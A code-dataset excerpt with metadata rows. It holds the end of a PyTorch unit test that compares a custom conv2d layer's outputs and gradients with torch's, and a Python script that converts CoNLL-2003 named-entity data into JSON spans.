conv2d_layer.kernels.data.copy_(weights.view(layer_weight_shape))
if has_bias:
conv2d_layer.bias.data.copy_(bias_tensor.view(out_ch, 1))
layer_result = conv2d_layer(input_layer)
layer_result_np = layer_result.data.numpy()
torch_result = torch_conv2d(input_torch)
torch_result_np = torch_result.data.numpy()
self.assertTrue(np.allclose(layer_result_np, torch_result_np))
# verify gradient
gradient = torch.DoubleTensor(layer_result.shape)
layer_result.backward(gradient)
torch_result.backward(gradient)
self.assertTrue(
np.allclose(
input_layer.grad.data.numpy(),
input_torch.grad.data.numpy(),
equal_nan=True))
layer_weight_grad = conv2d_layer.kernels.grad
torch_weight_grad = torch_conv2d.weight.grad.view(layer_weight_shape)
self.assertTrue(
np.allclose(
layer_weight_grad.data.numpy(),
torch_weight_grad.data.numpy(),
equal_nan=True))
if has_bias:
layer_bias_grad = conv2d_layer.bias.grad.view(out_ch)
torch_bias_grad = torch_conv2d.bias.grad.view(out_ch)
self.assertTrue(
np.allclose(
layer_bias_grad.data.numpy(),
torch_bias_grad.data.numpy(),
equal_nan=True))
def test1(self):
self.helper_func(0)
def test2(self):
self.helper_func(1)
def test3(self):
self.helper_func(2)
def test4(self):
self.helper_func(3)
def test5(self):
self.helper_func(4)
def test6(self):
self.helper_func(5)
def test7(self):
self.helper_func(6)
def test8(self):
self.helper_func(7)
def test9(self):
self.helper_func(8)
def test10(self):
self.helper_func(9)
if __name__ == '__main__':
unittest.main()
| [
"development.my6565@gmail.com"
] | development.my6565@gmail.com |
02ef3aceb670550ecb12d3958c68f836e5511627 | e7a9032a3a222dc7363e1f9c083559ef98ae33c7 | /scripts/convert_conll03_to_json.py | 76900a39699429f3a551ffb5dfaa92b8cf05911d | [
"MIT"
] | permissive | fagan2888/instance-based-ner | ed6ccee034661e6a9572ce8f2962b643f1a47c0d | 7bd8a29dfb1e13de0775b5814e8f9b27ec490008 | refs/heads/master | 2022-12-17T15:03:05.615927 | 2020-09-16T01:18:10 | 2020-09-16T01:18:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,290 | py | # coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import codecs
import random
import ujson
def load(filename):
with codecs.open(filename, mode="r", encoding="utf-8") as f:
words, tags = [], []
for line in f:
line = line.lstrip().rstrip()
if line.startswith("-DOCSTART-"):
continue
if len(line) == 0:
if len(words) != 0:
yield words, tags
words, tags = [], []
else:
line = line.split()
words.append(line[0])
tags.append(line[-1])
def write_json(filename, data):
with codecs.open(filename, mode="w", encoding="utf-8") as f:
ujson.dump(data, f, ensure_ascii=False)
def remove_duplicate_sents(sents):
new_sents = []
for i, (words1, tags1) in enumerate(sents):
for (words2, _) in sents[i + 1:]:
if words1 == words2:
break
else:
new_sents.append((words1, tags1))
return new_sents
def bio2span(labels):
spans = []
span = []
for w_i, label in enumerate(labels):
if label.startswith('B-'):
if span:
spans.append(span)
span = [label[2:], w_i, w_i]
elif label.startswith('I-'):
if span:
if label[2:] == span[0]:
span[2] = w_i
else:
spans.append(span)
span = [label[2:], w_i, w_i]
else:
span = [label[2:], w_i, w_i]
else:
if span:
spans.append(span)
span = []
if span:
spans.append(span)
return spans
def main(argv):
sents = list(load(argv.input_file))
print("Sents:%d" % len(sents))
if argv.remove_duplicates:
sents = remove_duplicate_sents(sents)
print("Sents (removed duplicates): %d" % len(sents))
data = []
n_sents = 0
n_words = 0
n_spans = 0
for words, bio_labels in sents:
spans = bio2span(bio_labels)
data.append({"sent_id": n_sents,
"words": words,
"bio_labels": bio_labels,
"spans": spans})
n_sents += 1
n_words += len(words)
n_spans += len(spans)
if argv.split > 1:
split_size = int(len(data) / argv.split)
random.shuffle(data)
data = data[:split_size]
n_sents = len(data)
n_words = 0
n_spans = 0
for record in data:
n_words += len(record["words"])
n_spans += len(record["spans"])
if argv.output_file.endswith(".json"):
path = argv.output_file
else:
path = argv.output_file + ".json"
write_json(path, data)
print("Sents:%d\tWords:%d\tEntities:%d" % (n_sents, n_words, n_spans))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='SCRIPT')
parser.add_argument('--input_file',
help='path to conll2003')
parser.add_argument('--output_file',
default="output",
help='output file name')
parser.add_argument('--remove_duplicates',
action='store_true',
default=False,
help='remove duplicates')
parser.add_argument('--split',
default=1,
type=int,
help='split size of the data')
main(parser.parse_args())
| [
"sadistictornado@yahoo.co.jp"
] | sadistictornado@yahoo.co.jp |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.